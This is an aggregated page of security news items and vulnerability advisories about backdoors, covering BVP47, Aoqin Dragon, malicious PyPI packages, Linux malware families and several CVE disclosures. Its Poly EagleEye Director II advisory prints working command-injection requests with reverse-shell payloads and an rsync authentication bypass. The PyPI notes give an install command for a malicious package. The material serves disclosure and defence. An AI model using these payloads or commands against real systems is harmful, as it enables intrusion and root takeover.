Common cybercriminals are a menace, there's no doubt about it – from bedroom hackers through to ransomware groups, cybercriminals are causing a lot of damage. But both the tools used and the threat posed by common cybercriminals pale in comparison to the tools used by more professional groups such as the famous hacking groups and state-sponsored groups.
In fact, these tools can prove almost

Common cybercriminals are a menace, there's no doubt about it – from bedroom hackers through to ransomware groups, cybercriminals are causing a lot of damage. But both the tools used and the threat posed by common cybercriminals pale in comparison to the tools used by more professional groups such as the famous hacking groups and state-sponsored groups.

In fact, these tools can prove almost impossible to detect – and guard against. BVP47 is a case in point. In this article, we'll outline how this powerful state-sponsored malware has been quietly circulating for years, how it so cleverly disguises itself, and explain what that means for cybersecurity in the enterprise.

**Background story behind BVP47**

It's a long story, fit for a spy novel. Earlier this year, a Chinese cybersecurity research group called Pangu Lab published an in-depth, 56-page report covering a piece of malicious code that the research group decided to call BVP47 (because BVP was the most common string in the code, and 47 given that the encryption algorithm uses the numerical value 0x47).

The report is truly in-depth with a thorough technical explanation, including a deep dive into the malware code. It reveals that Pangu Lab originally found the code during a 2013 investigation into the state of computer security at an organization that was most likely a Chinese government department – but why the group waited until now to publish the report isn't stated.

As a key factor, the report links BVP47 to the "Equation Group", which in turn has been tied to the Tailored Access Operations Unit at the United States National Security Agency (the NSA). Pangu Lab came to this conclusion because it found a private key that could trigger BVP47 within a set of files published by The Shadow Brokers (TSB) group. TSB attributed that file dump to the Equation Group, which leads us back to the NSA. You just couldn't make it up, and it's a story fit for a motion picture film.

**How does BVP47 work in practice?**

But enough about the spy vs. spy element of the story. What does BVP47 mean for cybersecurity? In essence, it works as a very clever and very well-hidden back door into the target network system, which enables the party that operates it to gain unauthorized access to data – and to do so undetected.

The tool has a couple of very sophisticated tricks up its sleeve, in part relying on exploiting behavior that most sysadmins would not look for – simply because nobody thought any technology tool would behave like that. It starts its infectious path by setting up a covert communication channel in a place nobody would think to look: TCP SYN packets.

In a particularly insidious turn, BVP47 has the capability to listen on the same network port in use by other services, which is something that's very difficult to do. In other words, it can be extremely hard to detect because it's difficult to differentiate between a standard service using a port, and BVP47 using that port.

The difficulty in defending against this line of attack

In yet another twist, the tool regularly tests the environment in which it runs and erases its tracks along the way, hiding its own processes and network activity to ensure there are no traces left to find.

What's more, BVP47 uses multiple encryption methods across multiple encryption layers for communication and data exfiltration. It's typical of the top-tier tools used by advanced persistent threat groups – including the state-sponsored groups.

Taken in combination, it amounts to incredibly sophisticated behavior that can evade even the most astute cybersecurity defenses. The most capable mix of firewalls, advanced threat protection and the like can still fail to stop tools such as BVP47. These backdoors are so powerful because of the resources deep-pocketed state actors can throw at developing them.

**As always, good practice is your best bet**

That doesn't mean, of course, that cybersecurity teams should just roll over and give up. There is a series of activities that can make it, at the very least, harder for an actor to deploy a tool such as BVP47. Awareness and detection activities are worth pursuing, as tight monitoring may still catch a remote intruder out. Similarly, honeypots can attract attackers to a harmless target – where they may well reveal themselves.

However, there's a simple, first-principles approach that delivers a huge amount of protection. Even sophisticated tools such as BVP47 relies on unpatched software to gain a foothold. Consistently patching the OS and applications you depend on is, therefore, your very first port of call.

The act of applying a patch in its own right isn't the most challenging step to take – but as we know, patching rapidly every single time is something most organizations struggle with.

And of course, that's exactly what threat actors such as the team behind BVP47 rely on, as they lie and wait for their target, who would inevitably be too resourced stretched to patch consistently, eventually missing a critical patch.

What can pressured teams do? Automated, live patching is one solution as it removes the need to patch manually – and eliminates time-consuming restarts and the associated downtime. Where live patching isn't possible, vulnerability scanning can be used to highlight the most critical patches.

**Not the first – and not the last**

In-depth reports such as this are important in helping us stay aware of critical threats. But BVP47 has been in play for years and years before this public report, and countless systems were attacked in the meantime – including high profile targets around the world.

We don't know how many similar tools are out there – all we know is what we need to do to maintain a consistently strong cybersecurity posture: monitor, distract and patch. Even if teams can't mitigate every threat they can at least mount an effective defense, making it as difficult as possible to successfully operate malware.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Even the Most Advanced Threats Rely on Unpatched Systems

A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed Aoqin Dragon has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.
"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,"

A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed **Aoqin Dragon** has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.

"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices," SentinelOne researcher Joey Chen said in a report shared with The Hacker News. "Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection."

The group is said to have some level of association with another threat actor known as Naikon (aka Override Panda), with campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam.

Infections chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed document lures as well as USB shortcut techniques to trigger the deployment of one of two backdoors: Mongall and a modified version of the open-source Heyoka project.

This involved leveraging old and unpatched security vulnerabilities (CVE-2012-0158 and CVE-2010-3333), with the decoy documents enticing targets into opening the files. Over the years, the threat actor also employed executable droppers masquerading as antivirus software to deploy the implant and connect to a remote server.

"Although executable files with fake file icons have been in use by a variety of actors, it remains an effective tool especially for APT targets," Chen explained. "Combined with 'interesting' email content and a catchy file name, users can be socially engineered into clicking on the file."

That said, Aoqin Dragon's newest initial access vector of choice since 2018 has been its use of a fake removable device shortcut file (.LNK), which , when clicked, runs an executable ("RemovableDisc.exe") that sports the icon for the popular note-taking app Evernote but is engineered to function as a loader for two different payloads.

One of the components in the infection chain is a spreader that copies all malicious files to other removable devices and the second module is an encrypted backdoor that injects itself into rundll32's memory, a native Windows process used to load and run DLL files.

Known to be used since at least 2013, Mongall ("HJ-client.dll") is described as a not-so "particularly feature rich" implant but one that packs enough features to create a remote shell and upload and download arbitrary files to and from the attacker-control server.

Also used by the adversary is a reworked variant of Heyoka ("srvdll.dll"), a proof-of-concept (PoC) exfiltration tool "which uses spoofed DNS requests to create a bidirectional tunnel." The modified Heyoka backdoor is more powerful, equipped with capabilities to create, delete, and search for files, create and terminate processes, and gather process information on a compromised host.

"Aoqin Dragon is an active cyber espionage group that has been operating for nearly a decade," Chen said, adding, "it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and stay longer in their target network."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia

pyanxdns package in PyPI version 0.2 is vulnerable to code execution backdoor. The impact is: execute arbitrary code (remote). When installing the pyanxdns package of version 0.2, the request package will be installed.

We found a malicious backdoor in version 0.2 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install pyanxdns==0.2 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.2 in PyPI.

CVE-2022-30882: code execution backdoor · Issue #1 · egeback/pyanxdns

api-res-py package in PyPI 0.1 is vulnerable to a code execution backdoor in the request package.

We found a malicious backdoor in version 0.1 of this project in PyPI, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install api-res-py -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.1 in PyPI.

Your project in PyPI:https://pypi.org/project/api-res-py/

CVE-2022-31313: code execution backdoor · Issue #1 · rakeshrkz7/as_api_res

The keep for python, as distributed on PyPI, included a code-execution backdoor inserted by a third party. The current version, without this backdoor, is 1.2.

We found a malicious backdoor in version 1.2 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install keep==1.2 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 1.2 in PyPI

CVE-2022-30877: code execution backdoor · Issue #85 · OrkoHunter/keep

WordPress Download Manager versions 3.2.42 and below suffer from a cross site scripting vulnerability.

    Description: Reflected Cross-Site ScriptingAffected Plugin: Download ManagerPlugin Slug: download-managerPlugin Developer: codename065Affected Versions: <= 3.2.42CVE ID: CVE-2022-1985CVSS Score: 6.1 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NResearcher/s: Rafie Muhammad (Yeraisci)Fully Patched Version: 3.2.43Download Manager is a file and document management plugin to help manage and control file downloads with various file download controls to restrict unauthorized file access. The plugin also provides a complete solution to sell digital products from WordPress sites, including checkout functionality to complete an order. One feature of the plugin is the ability to use a shortcode to embed files and other assets in a page or post. This function was found to be vulnerable to reflected Cross-Site Scripting.Secure coding practices would include checks to sanitize the input received by the page, and escaping that code on the output to ensure that only approved inputs and outputs are presented. Unfortunately, insufficient input sanitization and output escaping on the $_REQUEST[‘frameid’] parameter found in the ~/src/Package/views/shortcode-iframe.php file of the Download Manager plugin made it possible for an attacker to run arbitrary code in a victim’s browser by getting them to click on a specially crafted URL. This is due to the fact that the ‘frameid’ parameter was echoed to the page without sufficient user input validation.Without proper sanitization and escaping in place on user-supplied inputs, JavaScript can be used to manipulate the page. Even an unsophisticated attacker could hijack the form and use it to trick a site administrator into unknowingly disclosing sensitive information, or to collect cookie values.More specialized attackers would use this capability to gain administrator access or add a backdoor and take over the site. If the attacker gains this access, they would have access to the same information the administrator would be able to access, including user details and customer information.In the case of Download Manager, customer information and access to digital products would both be at risk. If an attacker were able to trick an administrator into clicking a link that has been designed to send session cookies to the attacker, add a malicious administrator account, or implement a backdoor on the website, the attacker would also have free reign in the administrator panel, giving them the ability to modify checkout settings and even add fake products to the website.ConclusionIn today’s post, we discussed a reflected Cross-Site Scripting (XSS) vulnerability in Download Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 3.2.43 as of this writing, as soon as possible.All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability.

WordPress Download Manager 3.2.42 Cross Site Scripting

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.
The post 5 Linux malware families SMBs should protect themselves against appeared first on Malwarebytes Labs.

There’s no shortage of reasons why an SMB might use Linux to run their business: There are plenty of distros to choose from, it’s (generally) free, and perhaps above all — it’s secure.

The common wisdom goes that Linux malware is rare, and for the most part this is true. Thanks to its built-in security defenses, strict user privilege model, and transparent source code, Linux enjoys far fewer malware infections than other operating systems.

But unfortunately, there’s more to Linux security than just leaning back in your chair and sipping piña coladas. There are dozens of Linux malware families out there today threatening SMBs with anything from ransomware to DDoS attacks.

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.

**1.   Cloud Snooper**

In early 2020, researchers found something weird going on with Linux servers hosted by Amazon Web Services (AWS). Specifically, they noticed some servers were receiving some anomalous inbound traffic.

In a perfect world, the firewalls of our servers would only allow web traffic in from trusted ports. With the Cloud Snooper malware, however, untrusted web traffic sneaks past firewalls and enters right into Linux servers — a big no-no.

**How it works**

The hackers pull this off with a rootkit, a set of malware tools that gives someone the highest privileges in a system. Attackers use the rootkit to then install a backdoor trojan which can steal sensitive data from the servers.

At a high level, Cloud Snooper gets past firewall rules by sending innocent-looking requests to the web server which actually contain hidden instructions for the backdoor trojan. From there, the attackers can do anything from log computer activity, steal data, or delete files.

It’s still unclear how the malware is installed in the first place, though the researchers think attackers break into servers using SSH.

**2.   QNAPCrypt**

If you wake up one morning and find that all of your files are encrypted along with a ransom note demanding a Bitcoin payment — you just may have been hit with QNAPCrypt.

QNAPCrypt is ransomware that specifically targets Linux-based NAS (Network Attached Storage) servers. It gets its name from QNAP, a popular vendor for selling NAS servers.

**How it works**

QNAPCrypt exploits a vulnerability in QNAP NAS running HBS 3 (Hybrid Backup Sync) to allow remote attackers to log in to a device. Once launched, the ransomware iterates through a list of files and encrypts them with an encryption algorithm, with the .**encrypt** extension being appended to affected files.

According to recent posts in a BleepingComputer forum, ransom payments are about .024BTC (~$720 USD as of June 2022).

**3.   Cheerscrypt**

Does your SMB use VMware ESXi servers? If so, you better watch out for Cheerscrypt, another Linux-based ransomware.

**How it works**

Upon execution, Cheerscrypt hijacks the ESXCLI tool — which allows for remote management of ESXi hosts — and uses it to terminate all VM processes. From there, hackers can encrypt all of your VMware-related files and rename them to the .**Cheers** extension.

The ransom note, named “How to Restore Your Files.txt”, threatens to expose company data if the ransom is not paid.

**4.   HiddenWasp**

HiddenWasp is a new strain of Linux malware that remotely controls infected systems with an initial deployment script, a trojan, and a rootkit.

**How it works**

After HiddenWasp installs all of the malware components to your computer, the deployment script begins to execute the trojan and add the rootkit. The rootkit is added then to a given process, where it hides the existence of the trojan. The trojan, in turn, helps the rootkit remain operational.

From there, attackers can execute files, spy on computer usage, change system configurations, and so on — all while being unseen.

**5.   Mirai**

From manufacturing to healthcare, tons of industries today are using the Internet-of-Things (IoT) to help streamline their operations — and at the heart of every IoT device is Linux. Mirai, a botnet responsible for the “takedown of the Internet” in 2016, takes advantage of this by hijacking IoT hardware to launch DDoS attacks.

**How it works**

Mirai is a self-replicating worm that scans for and infects vulnerable IoT devices that use default or weak usernames and passwords. Once infected, these compromised IoT devices can be told what to do via a central set of command and control (C&C) servers, specifically to launch DDoS attacks.

While Mirai itself may not be around anymore, its source code lives on in several other botnets variants including Hajime, SYLVEON, and SORA.

**Stop Linux malware from getting a hold on your organization**

It may be true that Linux is more secure than most other operating systems, but make no mistake — Linux malware exists, and can have devastating effects on SMBs.

While we have given a brief overview of five Linux malware families, there are dozens more out there, each with their own unique payload. From ransomware and rootkits to trojans and botnets, there’s a slew of threats SMBs using Linux need to protect themselves against.

With Malwarebytes EDR for Linux, you can simplify protection, detection, and response capabilities across your entire organization. Even brand-new, unidentified Linux malware can typically be eliminated before it can impact your data center servers.

Additionally, applying in-depth insights from our proprietary Linking Engine remediation technology, Malwarebytes thoroughly and permanently removes both the infection and any malware artifacts, delivering lethal “one-and-done” remediation.

Learn more about Malwarebytes EDR.

Read the data sheet.

5 Linux malware families SMBs should protect themselves against

Rob Gurzeev, CEO and Co-Founder of CyCognito, explores external attack surface soft spots tied to an ever-expanding number of digital assets companies too often struggle to keep track of and manage effectively.

Rob Gurzeev, CEO and Co-Founder of CyCognito, explores external attack surface soft spots tied to an ever-expanding number of digital assets companies too often struggle to keep track of and manage effectively.

Internet Protocol (IP) addresses and the devices, web services and cloud assets behind them are the lifeblood of modern businesses. But too often companies amass thousands of digital assets, creating an unmanageable mess for IT and security teams. Left unchecked, a single forgotten, abandoned or unknown digital asset is a cybersecurity timebomb.

Why should seeing and managing every single digital thing in your network be a priority? The odds are they are the fastest growing part of your organization’s infrastructure. Effective digital asset management – including IP address visibility – is your foundation to thwart an attacker’s path of least resistance into your network.

For the past two decades, security teams have focused on internal asset risk. Public-facing digital assets and IP addresses were part of the “DMZ,” a fortified and very limited perimeter to defend. But then came digital transformation, spurred by a global pandemic and an ensuing work-from-home trend, and network boundaries melted, giving way to the everything-is-a-hosted-service modern architecture of today.

****Digital Assets: Dead, Forgotten and Dangerous**  **

The digital transformation of business over the past two years has spurred a tsunami of new web applications, databases and IoT devices. They have created a massive new attack surface for organizations, which includes complex cloud-native IT infrastructure. Potentially exposed are thousands of APIs, servers, IoT devices and SaaS assets.

A poorly managed digital asset is a ticking time bomb. Big risks reside, for example, in web apps. In a recent CyCognito survey, we found Global 2000 organizations have an average of 5,000 exposed web interfaces each, representing up to 7 percent of their external attack surface. Of those web apps, we found no shortage of open source JavaScript vulnerabile library issues such as jQuery, JQuery-UI and Bootstrap. Also in no short supply are SQL injection, XSS and PII exposure vulnerabilities.

Unknown or poorly managed, any external-facing asset can act as an invitation for an adversary to breach your network. Attackers can then steal data, spread malware, disrupt infrastructure and achieve persistent unauthorized access.

When we talk to companies about their attack surface, we seldom hear them express confidence about mastering their digital assets. Many companies still keep track of IP addresses, and in turn connected assets, via an Excel spreadsheet. Efficient? Only for the smallest of organizations. A 2021 study by ESG found 73 percent of security and IT pros depend on them.

Priority number one is your company’s crown jewels – data. And I would argue, protection of IP addresses and connected assets deserve a more modern management approach that can squash issues before they surface.

****Good Intentions Can Go Awry****

But even companies with good intentions can make errors. Let’s say an enterprise helpdesk creates an internal ticketing system accessible only through an internal URL. An adversary might leverage the URL’s underlying IP address and open a network backdoor (or port) by adding “:8118”.

That’s why IP addresses, including related technology such as ports, domains and certificates, can represent significant security and reputational risk.

The result can be a graveyard of digital asset soft spots that too often become entry points for adversaries, such as forgotten or poorly managed DevOps or SecOps tools, cloud products and device web interfaces.

Within today’s complex enterprise, system administrators typically only have visibility into a subset of devices they are responsible to manage. And if the asset isn’t on your radar screen you can’t mitigate the risk.

****Why Managing IP-Connected Assets is Like Herding Cats****

Among CyCognito’s customer base, over the past 12 months we have seen the number of IP addresses (and related digital assets) grow within organizations by 20 percent. That growth at least partially is attributed to cloud adoption and a reliance on connected devices and web app that inhabit corporate networks. But often overlooked is infrastructure sprawl when a company may grow or shrink.

Merger and acquisition (M&A) activity, for example, can often leave an enterprise flat-footed when it comes to getting their arms around IP address management. Let’s say a hotel conglomerate acquires a smaller competitor. When that happens it also inherits a potential minefield of unmanaged and unknown IP addresses and domains.

Dead and forgotten domains – a different type of digital asset – often fall prey to what is known as a dangling DNS record, where an adversary can take over a forgotten subdomain by reregistering it. Those subdomains, which formerly connected to company resources but are now fully controlled by a bad actor, can then be used to reroute a company’s web traffic, causing data loss and reputational damage.

Similarly, divestitures of subsidiaries can result in abandoned infrastructure and orphaned digital assets and related web apps. These forgotten assets are often overlooked by IT teams, but not by opportunistic hackers.

Worse are insecure ports leaving devices open to default credential attacks. After all, for an adversary to scan for and find open ports, they need a poorly managed cloud service or IP-connected hardware.

Lastly, unmanaged IT infrastructure and assets obtained through an acquisition, can waste valuable time. Consider how a poorly managed IP address could send IT security teams on high alert to understand why company assets are being used in a country it doesn’t do business in.

To protect the critical data, thwart malware infection and prevent breaches, part of the answer is effective digital asset management and IP address visibility. Too many system administrators are still beholden to that archaic spreadsheet-based asset management system.

Additionally, legacy scanners that ignore attack vectors and detect only CVEs in known assets, aren’t up for assessing risk tied to the multitude of digital assets within a company. For example, in the previous case of the internal ticketing system – accidentally being exposed to the internet through the URL https://X.X.X.X\[:\]8118 – port scanning on that IP will find nothing but an HTTPs service at best. Scanners definitely won’t understand the context and criticality of the exposure. Same goes with accidentally open directories on company-owned cloud assets, which could contain employee credentials and terabytes of sensitive data.

****Ignorance is not Bliss & Seeing Is Believing****

Of course, digital assets aren’t dangerous by default. Rather, the risk is tied to management of an IT stack and the ability of a sysadmin to juggle the myriad of connected applications tied to on-prem, off-prem, managed and unmanaged services.

The conundrum is, “how do you manage what you don’t know is there?”

Implementing network segmentation, with zero trust solutions and aggressive IP and port scanning, along with asset discovery, are all needed responses to the problem of mitigating the threat. But these solutions do not address 100 percent of the problem.

It is like giving a community a clean COVID bill of health based on testing 20 percent of the residents. Without the other 80 percent tested you really have no idea how safe you are.

Even perfect vulnerability management of 90 percent of an attack surface doesn’t matter when 10 percent may go unseen and unmanaged.

Costs associated with inefficient discovery tools and limited IT resources for fixing found issues are also roadblocks to effective attack surface management.

A new mindset around the “discovery” of exposed critical assets is needed for attack surface management. Continuous discovery of those paths of least resistance for attackers at scale, coupled with security testing and contextualizing the risk of valuable assets being compromised is vital. CyCognito is pioneering this idea around exposure and risk management versus slow, limited scope and expensive vulnerability management.

Imagine seeing your entire attack surface – and those of your subsidiaries – and being able to prioritize fixes based on a risk profile that tells you the probability of the specific asset being hacked. In the context of digital assets, visibility into your entire IP landscape and prioritizing what needs to be addressed first can go a long way toward a safer IT environment.

The bigger picture? Adversaries always seek the path of least resistance. They avoid harder attack paths because they tend to be noisy and increase the risk of a defender detecting and responding. A modern approach to external attack surface management should leverage the same path-of-least-resistance principles of asset remediation prioritization, mean time to recovery (MTTR) reduction and answer the question: “Are we secure?”

_Rob Gurzeev is the CEO and Co-Founder of the external attack surface management firm CyCognito. He is an offensive security expert focused on delivering cybersecurity solutions that help organizations find and eliminate the paths attackers exploit._

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Taming the Digital Asset Tsunami

Backdoor.Win32.Cabrotor.10.d malware suffers from an unauthenticated remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/40acf109fa9621eae6930ef18f804909.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cabrotor.10.dVulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 1243. Attackers who can reach infected systems can issue commands made up of single characters E.g. sending 'Q' will terminate the backdoor. Executing wrong or unknown commands will result in the following server response "Comando desconocido".Family: CabrotorType: PE32MD5: 40acf109fa9621eae6930ef18f804909Vuln ID: MVID-2022-0612Disclosure: 06/06/2022Exploit/PoC:C:\>python -c "print('Q')" | nc64.exe x.x.x.x 1243CaBroNaToR Server 1.0Conexion estableciada el dia 5/2/2022 a las 02:47:35 AMFin de conexion - 02:47:35 AMDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cabrotor.10.d MVID-2022-0612 Remote Command Execution

Poly EagleEye Director II version 2.2.1.1 suffers from multiple authenticated remote command injection vulnerabilities as well as an authentication bypass vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20220601-0 >  
=======================================================================  
               title: Multiple Critical Vulnerabilities  
             product: Poly EagleEye Director II  
  vulnerable version: 2.2.1.1 (Jul 1, 2021)  
       fixed version: 2.2.2.1 or higher  
          CVE number: CVE-2022-26479, CVE-2022-26482  
              impact: critical  
            homepage: https://www.poly.com  
               found: 2021-07-14  
                  by: Johannes Kruchem (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Why settle for a one-size-fits-all view of your conference room?  
EagleEye Director II takes video conferencing and conference room web  
cameras to the next level—with people-tracking technology and automatic zoom.  
You’ll find that when people aren’t worrying about staying in camera view or  
how to work a remote control, they stay focused on the bigger issue—solving  
critical business problems."

Source: https://www.poly.com/us/en/products/video-conferencing/studio/studio-x50

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)  
When logged on to the administration web interface, command injection payloads  
can be inserted in at least four different fields. This happens because the  
user input is not escaped and gets concatenated with a string which is executed  
afterwards with "os.system()". The webserver was started as "www-data" who  
has sudo privileges.

2) Authentication Bypass (CVE-2022-26479)  
The authentication can be bypassed by creating a specific file on the file system.  
If this file is created, every API call is executed as admin with no further  
authentication (sessionid). This behavior could not be found in any  
documentation. The creation of this file was possible with rsync for which a  
backdoor account was found. The rsync daemon runs on port 873 and provides the  
modules "/flag" and "/update".

The combination of 1) and 2) leads to an privileged unauthenticated OS command  
injection.

Proof of concept:  
-----------------  
1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)  
When logged into the web interface, the name of the device can be changed in  
the settings. A command can be injected with $(<command>) in the name. To  
bypass the length-limit the payload can be changed in the POST request, which  
looks as follows:  
-------------------------------------------------------------------------------  
POST /api/deviceName HTTP/1.1  
Host: 10.0.0.3  
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE  
Connection: close

{"deviceName":"EEDII-Master $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 8888 >/tmp/f)"}  
-------------------------------------------------------------------------------

It looks as follows on the host system, where an nc listener was started:

$ nc -lvp 8888  
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.3]  
$ whoami  
www-data

Sudo allowed executing commands as root:

$ sudo whoami  
root

Also the following request results in command execution. This request was not  
intercepted but reconstructed from the source code of the application.  
-------------------------------------------------------------------------------  
POST /api/region HTTP/1.1  
Host: 10.0.0.3  
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE  
Content-Length: 45

{"region":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 9999 >/tmp/f)"}  
-------------------------------------------------------------------------------

When enabling 802.1X, one can see that the payload "sudo sh" works as well. In  
this case an attacker is root immediately:  
-------------------------------------------------------------------------------  
POST /api/ethernetSettings HTTP/1.1  
Host: 10.0.0.3  
Cookie: language=StringResource.de-DE; sessionid=l5qvshh7h5p4y1ve37opkzwx0fk6xy4h  
Content-Length: 83

{"s8021X":"enabled","identity":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)","password":"asd"}  
-------------------------------------------------------------------------------

When generating a certificate, the following payload can be injected to execute  
a reverse shell:  
-------------------------------------------------------------------------------  
POST /api/certificate HTTP/1.1  
Host: 10.0.0.3  
Cookie: language=StringResource.de-DE; sessionid=vxxs25a2mcn5xz4ndjao9noogpqc7yy2  
Connection: close

{"name":"EagleEyeDirectorII.polycom.com\n","country":"US","province":"California","city":"San Jose",  
"organization":"Polycom Inc. \":\"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)",  
"organizationUnit":"Video Division"}  
-------------------------------------------------------------------------------

2) Authentication Bypass (CVE-2022-26479)  
Step 1 - Find the rsync backdoor account  
The rsync modules "/flag" and "/update" are configured to require  
authentication. In the rsync config file "/etc/rsyncd.conf" the file  
"/etc/rsyncd.scrt" was set as secrets file which contains the following  
"user:password" in plain text. This user was not found in any documentation:

visage:<PoC removed>

Step 2 - Find the authentication bypass  
The source code in "/www/DjangoTest/TestApp/api2.py" contains the following  
code snippet:  
-------------------------------------------------------------------------------  
def checkCookie(request):  
   <snipped>  
   filename = "/data/local/tmp/runAutomationFlag"  
   if (os.path.exists(filename)):  
     logger.info("run automation, do not check cookie")  
     return "success"  
   else:  
     <snipped>  
-------------------------------------------------------------------------------

If the file "runAutomationFlag" exists in "/data/local/tmp", the cookie is not  
going to be checked anymore. Coincidentally, the rsync module "/flag" is  
configured for the path "/data/local" so a "/tmp" needs to be attached. To  
exploit this authentication bypass the runAutomationFlag file can be copied to  
the remote path as follows:

$ touch runAutomationFlag  
$ rsync -av ./runAutomationFlag rsync://visage@10.0.0.3:873/flag/tmp  
Password  
sending incremental file list  
runAutomationFlag

Now the file is in the specific location:

$ pwd  
/data/local/tmp  
$ ls  
rebootcnt.txt  
runAutomationFlag

The payloads from 1) can now be sent unauthenticated since the cookies are not  
checked anymore. This behavior is not documented.

Vulnerable / tested versions:  
-----------------------------  
Version 2.2.1.1 (Jul 1, 2021) was found to be vulnerable.

Vendor contact timeline:  
------------------------  
2021-07-14: Contacting vendor through PSIRT email.  
2021-07-15: Vendor sent PGP key.  
2021-07-16: Advisory was sent to the vendor.  
2021-07 to 2022-03: Further coordination with multiple emails and meetings.  
2022-03-18: Vendor provides draft advisory.  
2022-03 - 2022-06: Patch already available, waiting for vendor advisory release.  
2022-06-01: Coordinated release of security advisory.

Solution:  
---------  
Update to firmware version 2.2.2.1 or higher.

The firmware can be downloaded from the vendor's support page:  
https://www.poly.com/us/en/support/products

This issue has been documented in the vendor's security advisory PLYPL21-12:  
https://www.poly.com/content/dam/www/products/support/global/security/2022/PLYPL21-12_EEDII-Multiple-Security-Vulnerabilities.pdf

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Johannes Kruchem / @2022

Tag

#backdoor